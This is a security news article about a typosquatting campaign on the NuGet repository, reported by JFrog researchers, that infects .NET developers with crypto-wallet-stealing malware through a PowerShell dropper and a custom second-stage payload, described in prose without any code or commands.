Threat actors are targeting and infecting .NET developers with cryptocurrency stealers delivered through the NuGet repository and impersonating multiple legitimate packages via typosquatting.
Three of them have been downloaded over 150,000 times within a month, according to JFrog security researchers Natan Nehorai and Brian Moussalli, who spotted this ongoing campaign.
While the massive number of downloads could point to a large number of .NET developers who had their systems compromised, it could also be explained by the attackers’ efforts to legitimize their malicious NuGet packages.
“The top three packages were downloaded an incredible amount of times – this could be an indicator that the attack was highly successful, infecting a large amount of machines,” the JFrog security researchers said.
“However, this is not a fully reliable indicator of the attack’s success since the attackers could have automatically inflated the download count (with bots) to make the packages seem more legitimate.”
The threat actors also used typosquatting when creating their NuGet repository profiles to impersonate what looked like the accounts of Microsoft software developers working on the NuGet .NET package manager.
The malicious packages are designed to download and execute a PowerShell-based dropper script (init.ps1) that configures the infected machine to allow PowerShell execution without restrictions.
“This behavior is extremely rare outside of malicious packages, especially taking into consideration the “Unrestricted” execution policy, which should immediately trigger a red flag,” the researchers explained.
In the next step, it downloads and launches a second-stage payload, a Windows executable described by JFrog as a “completely custom executable payload.”
This is an unusual approach compared to other attackers who will mostly use open-source hacking tools and commodity malware instead of creating their own payloads.
The malware deployed on compromised systems can be used for stealing cryptocurrency by exfiltrating the victims’ crypto wallets using Discord webhooks, extracting and executing malicious code from Electron archives, and auto-updating by querying the attacker-controlled command-and-control (C2) server.
“Some packages did not contain any direct malicious payload. Instead, they defined other malicious packages as dependencies, which then contained the malicious script,” the researchers added.
Payloads delivered in this attack have very low detection rates and will not be flagged as malicious by Defender, the built-in anti-malware component in the Microsoft Windows operating system.
This attack is part of a broader malicious effort, with other attackers going as far as uploading more than 144,000 phishing-related packages on multiple open-source package repositories, including NPM, PyPi, and NuGet, as part of a large-scale campaign active throughout 2022.